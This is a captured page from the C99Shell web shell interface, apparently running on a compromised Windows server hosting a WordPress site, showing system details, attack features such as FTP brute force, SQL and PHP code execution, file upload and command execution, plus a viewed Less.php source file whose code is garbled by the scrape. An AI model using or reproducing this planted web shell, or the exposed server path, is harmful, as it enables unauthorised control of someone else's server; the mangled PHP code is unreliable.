!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wcp-contact-form\vendor\oyejorge\less.php\lib\Less\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Tree.php (1.54 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Tree
 *
 * @package Less
 * @subpackage tree
 */
class Less_Tree{

    public 
$cache_string;

    public function 
toCSS(){
        
$output = new Less_Output();
        
$this->genCSS($output);
        return 
$output->toString();
    }


    
/**
     * Generate CSS by adding it to the output object
     *
     * @param Less_Output $output The output
     * @return void
     */
    
public function genCSS($output){}


    
/**
     * @param Less_Tree_Ruleset[] $rules
     */
    
public static function outputRuleset$output$rules ){

        
$ruleCnt count($rules);
        
Less_Environment::$tabLevel++;


        
// Compressed
        
if( Less_Parser::$options['compress'] ){
            
$output->add('{');
            for( 
$i 0$i $ruleCnt$i++ ){
                
$rules[$i]->genCSS$output );
            }

            
$output->add'}' );
            
Less_Environment::$tabLevel--;
            return;
        }


        
// Non-compressed
        
$tabSetStr "\n".str_repeat'  ' Less_Environment::$tabLevel-);
        
$tabRuleStr $tabSetStr.'  ';

        
$output->add" {" );
        for(
$i 0$i $ruleCnt$i++ ){
            
$output->add$tabRuleStr );
            
$rules[$i]->genCSS$output );
        }
        
Less_Environment::$tabLevel--;
        
$output->add$tabSetStr.'}' );

    }

    public function 
accept($visitor){}


    public static function 
ReferencedArray($rules){
        foreach(
$rules as $rule){
            if( 
method_exists($rule'markReferenced') ){
                
$rule->markReferenced();
            }
        }
    }


    
/**
     * Requires php 5.3+
     */
    
public static function __set_state($args){

        
$class get_called_class();
        
$obj = new $class(null,null,null,null);
        foreach(
$args as $key => $val){
            
$obj->$key $val;
        }
        return 
$obj;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--